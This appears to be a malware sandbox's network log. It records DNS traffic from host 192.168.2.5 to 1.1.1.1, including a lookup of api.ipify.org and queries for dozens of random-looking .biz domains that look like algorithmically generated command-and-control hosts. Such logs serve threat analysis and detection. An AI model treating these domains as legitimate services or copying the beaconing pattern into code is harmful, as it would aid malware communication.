                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.365513086 CEST6201853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.372601032 CEST53620181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.121469975 CEST5335453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.128508091 CEST53533541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.731456041 CEST5482553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.739042997 CEST53548251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.739558935 CEST5179253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.747589111 CEST53517921.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.535470963 CEST5950353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.543853045 CEST53595031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.391563892 CEST5118353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.399429083 CEST53511831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.956198931 CEST6054253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.963459015 CEST53605421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.553425074 CEST6263453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.561502934 CEST53626341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.701648951 CEST6068553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.710150957 CEST53606851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.325243950 CEST5327753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.332496881 CEST53532771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.938456059 CEST5084953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.945869923 CEST53508491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.884596109 CEST5330253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.892818928 CEST53533021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.002825975 CEST5699153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.010734081 CEST53569911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.771399021 CEST5656253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.954185009 CEST53565621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.296082020 CEST5240953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.304174900 CEST53524091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.660382032 CEST6281953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.667912960 CEST53628191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.745841980 CEST6173953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.902606964 CEST5508653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.910897970 CEST53550861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.942065001 CEST53617391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.495413065 CEST5899153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.675154924 CEST53589911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.765274048 CEST5977553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.772552967 CEST53597751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.048964024 CEST6266553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.055941105 CEST53626651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.517148972 CEST5106553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.524832010 CEST53510651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.084662914 CEST5720153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.092335939 CEST53572011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.584666967 CEST6020753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.678770065 CEST53602071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.942850113 CEST5246653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.950445890 CEST53524661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.425131083 CEST6296453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.432939053 CEST53629641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.073003054 CEST5779753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.081075907 CEST53577971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.279267073 CEST6384353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.286775112 CEST53638431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.115287066 CEST6001453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.123126030 CEST53600141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.126297951 CEST6223653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.255410910 CEST6223653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343812943 CEST53622361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343839884 CEST53622361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.486633062 CEST6455053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.508049965 CEST6455053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.596824884 CEST53645501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.597018003 CEST53645501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.093257904 CEST6116553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.100629091 CEST53611651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.854765892 CEST6057753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.862147093 CEST53605771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.031408072 CEST5270253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.038822889 CEST53527021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.632373095 CEST5845353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.640398026 CEST53584531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.133444071 CEST6091153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.141946077 CEST53609111.1.1.1192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Oct 10, 2024 10:08:56.514288902 CEST  59378        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:56.521702051 CEST  53           59378      1.1.1.1      192.168.2.5
Oct 10, 2024 10:08:56.958306074 CEST  54338        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:56.965785027 CEST  53           54338      1.1.1.1      192.168.2.5
Oct 10, 2024 10:08:57.712210894 CEST  59197        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:57.720726967 CEST  53           59197      1.1.1.1      192.168.2.5
Oct 10, 2024 10:08:58.292406082 CEST  51769        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:58.299818039 CEST  53           51769      1.1.1.1      192.168.2.5
Oct 10, 2024 10:08:58.365560055 CEST  65506        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:58.383003950 CEST  65506        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:58.390022039 CEST  53           65506      1.1.1.1      192.168.2.5
Oct 10, 2024 10:08:58.628931046 CEST  53           65506      1.1.1.1      192.168.2.5
Oct 10, 2024 10:08:59.640188932 CEST  62514        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:08:59.647563934 CEST  53           62514      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:00.397409916 CEST  49969        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:00.405123949 CEST  53           49969      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:00.482611895 CEST  51691        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:00.490252018 CEST  53           51691      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:01.297976971 CEST  63407        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:01.305067062 CEST  53           63407      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:01.846045971 CEST  51080        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:01.853338957 CEST  53           51080      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:02.219214916 CEST  51151        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:02.226409912 CEST  53           51151      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:02.358275890 CEST  59744        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:02.365505934 CEST  53           59744      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:02.862147093 CEST  60526        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:02.870474100 CEST  53           60526      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:03.997092009 CEST  59173        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:04.004905939 CEST  53           59173      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:04.565181971 CEST  56701        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:04.573654890 CEST  53           56701      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:04.574513912 CEST  64186        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:04.582066059 CEST  53           64186      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:05.117322922 CEST  64551        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:05.125083923 CEST  53           64551      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:05.589631081 CEST  56796        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:05.689766884 CEST  56796        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:05.693413019 CEST  62760        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:05.700743914 CEST  53           62760      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:05.771612883 CEST  53           56796      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:05.772023916 CEST  53           56796      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:07.361083031 CEST  62141        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:07.368706942 CEST  53           62141      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:07.445163012 CEST  53567        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:07.451927900 CEST  53           53567      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:08.747029066 CEST  60579        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:08.754210949 CEST  53           60579      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:08.866389990 CEST  57994        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:08.873372078 CEST  53           57994      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:09.124671936 CEST  63554        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:09.132422924 CEST  53           63554      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:09.490029097 CEST  54308        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:09.497543097 CEST  53           54308      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:10.097177029 CEST  52721        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:10.103873968 CEST  53           52721      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:10.868161917 CEST  64069        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:10.875994921 CEST  53           64069      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:11.011159897 CEST  51619        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:11.019077063 CEST  53           51619      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:11.185734034 CEST  49214        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:11.193454027 CEST  53           49214      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:11.383723021 CEST  57778        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:11.392004013 CEST  53           57778      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.263416052 CEST  62798        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.269483089 CEST  51043        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.270463943 CEST  53           62798      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.276465893 CEST  53           51043      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.303419113 CEST  49380        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.310811043 CEST  53           49380      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.341582060 CEST  54489        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.348547935 CEST  53           54489      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.379683971 CEST  51646        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.386734009 CEST  53           51646      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.432420969 CEST  65086        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.440347910 CEST  53           65086      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.474070072 CEST  61159        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.481398106 CEST  53           61159      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.487981081 CEST  55672        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.495523930 CEST  53           55672      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:12.537816048 CEST  55811        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:12.545144081 CEST  53           55811      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:13.284212112 CEST  56506        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:13.291323900 CEST  53           56506      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:13.323402882 CEST  60293        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:13.352051973 CEST  60293        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:13.462415934 CEST  53           60293      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:13.462444067 CEST  53           60293      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:13.490817070 CEST  49236        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:13.498116016 CEST  53           49236      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:13.944935083 CEST  57507        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:13.952195883 CEST  53           57507      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:13.955447912 CEST  53226        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:13.962832928 CEST  53           53226      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:14.373477936 CEST  64669        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:14.380506039 CEST  53           64669      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:15.336637974 CEST  61956        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:15.344424009 CEST  53           61956      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:15.378068924 CEST  65323        53         192.168.2.5  1.1.1.1
Oct 10, 2024 10:09:15.385799885 CEST  53           65323      1.1.1.1      192.168.2.5
Oct 10, 2024 10:09:16.277139902 CEST  60378        53         192.168.2.5  1.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.305124044 CEST6037853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.414088011 CEST53603781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.414092064 CEST53603781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.748071909 CEST5547753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.755819082 CEST53554771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.469504118 CEST6536053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.476671934 CEST53653601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.176702976 CEST6381353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.183769941 CEST53638131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.484422922 CEST5689753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.492815971 CEST53568971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.974982023 CEST5655953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.982605934 CEST53565591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.240353107 CEST6130753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.248027086 CEST53613071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.695300102 CEST5195653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.702675104 CEST53519561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.108798981 CEST6187753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.120650053 CEST53618771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.186536074 CEST5712353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.194258928 CEST53571231.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.958084106 CEST5674353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.976974010 CEST5674353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.171539068 CEST53567431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.171607018 CEST53567431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.400058985 CEST5486953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.406862974 CEST53548691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.408684015 CEST5268553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.415685892 CEST53526851.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 10, 2024 10:07:23.342924118 CEST | 192.168.2.5 | 1.1.1.1 | 0x8063 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:23.601206064 CEST | 192.168.2.5 | 1.1.1.1 | 0x6b19 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:24.782464981 CEST | 192.168.2.5 | 1.1.1.1 | 0x8a94 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:24.969414949 CEST | 192.168.2.5 | 1.1.1.1 | 0x3311 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:26.768829107 CEST | 192.168.2.5 | 1.1.1.1 | 0xbcc0 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:26.772661924 CEST | 192.168.2.5 | 1.1.1.1 | 0xb66c | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:27.805931091 CEST | 192.168.2.5 | 1.1.1.1 | 0xad3a | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:27.853192091 CEST | 192.168.2.5 | 1.1.1.1 | 0xbd45 | Standard query (0) | s82.gocheapweb.com | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:28.173118114 CEST | 192.168.2.5 | 1.1.1.1 | 0x256d | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:28.326325893 CEST | 192.168.2.5 | 1.1.1.1 | 0xfaa | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:29.108968019 CEST | 192.168.2.5 | 1.1.1.1 | 0x3b3a | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:29.531250000 CEST | 192.168.2.5 | 1.1.1.1 | 0x3833 | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:29.544971943 CEST | 192.168.2.5 | 1.1.1.1 | 0xbfd3 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:30.046320915 CEST | 192.168.2.5 | 1.1.1.1 | 0x3fc2 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:30.920808077 CEST | 192.168.2.5 | 1.1.1.1 | 0x457c | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:30.931174994 CEST | 192.168.2.5 | 1.1.1.1 | 0x5da3 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:30.939405918 CEST | 192.168.2.5 | 1.1.1.1 | 0x94a4 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:31.567168951 CEST | 192.168.2.5 | 1.1.1.1 | 0x2dec | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:31.577907085 CEST | 192.168.2.5 | 1.1.1.1 | 0x99fa | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:33.325433016 CEST | 192.168.2.5 | 1.1.1.1 | 0xaad4 | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:33.333301067 CEST | 192.168.2.5 | 1.1.1.1 | 0x7c3f | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:33.351183891 CEST | 192.168.2.5 | 1.1.1.1 | 0xa0f1 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:45.791235924 CEST | 192.168.2.5 | 1.1.1.1 | 0x4376 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:07:56.930687904 CEST | 192.168.2.5 | 1.1.1.1 | 0x6166 | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:01.023364067 CEST | 192.168.2.5 | 1.1.1.1 | 0xa845 | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:04.919292927 CEST | 192.168.2.5 | 1.1.1.1 | 0x69d | Standard query (0) | xlfhhhm.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:06.411892891 CEST | 192.168.2.5 | 1.1.1.1 | 0x1222 | Standard query (0) | ifsaia.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:08.041007996 CEST | 192.168.2.5 | 1.1.1.1 | 0xe39d | Standard query (0) | saytjshyf.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:09.272866964 CEST | 192.168.2.5 | 1.1.1.1 | 0xf4eb | Standard query (0) | vcddkls.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:11.155543089 CEST | 192.168.2.5 | 1.1.1.1 | 0xb8d3 | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:12.695547104 CEST | 192.168.2.5 | 1.1.1.1 | 0x639b | Standard query (0) | tbjrpv.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:13.679730892 CEST | 192.168.2.5 | 1.1.1.1 | 0x9409 | Standard query (0) | deoci.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:14.666750908 CEST | 192.168.2.5 | 1.1.1.1 | 0x7233 | Standard query (0) | gytujflc.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:15.599189043 CEST | 192.168.2.5 | 1.1.1.1 | 0x573d | Standard query (0) | qaynky.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:18.709276915 CEST | 192.168.2.5 | 1.1.1.1 | 0x8c09 | Standard query (0) | bumxkqgxu.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:19.538527012 CEST | 192.168.2.5 | 1.1.1.1 | 0x43db | Standard query (0) | dwrqljrr.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:20.788475990 CEST | 192.168.2.5 | 1.1.1.1 | 0x1d8 | Standard query (0) | nqwjmb.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:22.400291920 CEST | 192.168.2.5 | 1.1.1.1 | 0xcdc9 | Standard query (0) | ytctnunms.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:22.944672108 CEST | 192.168.2.5 | 1.1.1.1 | 0x1434 | Standard query (0) | myups.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:24.992893934 CEST | 192.168.2.5 | 1.1.1.1 | 0x3441 | Standard query (0) | oshhkdluh.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:25.847407103 CEST | 192.168.2.5 | 1.1.1.1 | 0xc8cb | Standard query (0) | yunalwv.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:26.999830961 CEST | 192.168.2.5 | 1.1.1.1 | 0x6247 | Standard query (0) | jpskm.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:28.120148897 CEST | 192.168.2.5 | 1.1.1.1 | 0x12f8 | Standard query (0) | lrxdmhrr.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:29.046667099 CEST | 192.168.2.5 | 1.1.1.1 | 0x4df7 | Standard query (0) | wllvnzb.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:30.675142050 CEST | 192.168.2.5 | 1.1.1.1 | 0x80c4 | Standard query (0) | gnqgo.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:31.365513086 CEST | 192.168.2.5 | 1.1.1.1 | 0x7f9e | Standard query (0) | jhvzpcfg.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:32.121469975 CEST | 192.168.2.5 | 1.1.1.1 | 0x6315 | Standard query (0) | acwjcqqv.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:33.731456041 CEST | 192.168.2.5 | 1.1.1.1 | 0x9f18 | Standard query (0) | lejtdj.biz | A (IP address) | IN (0x0001) | false
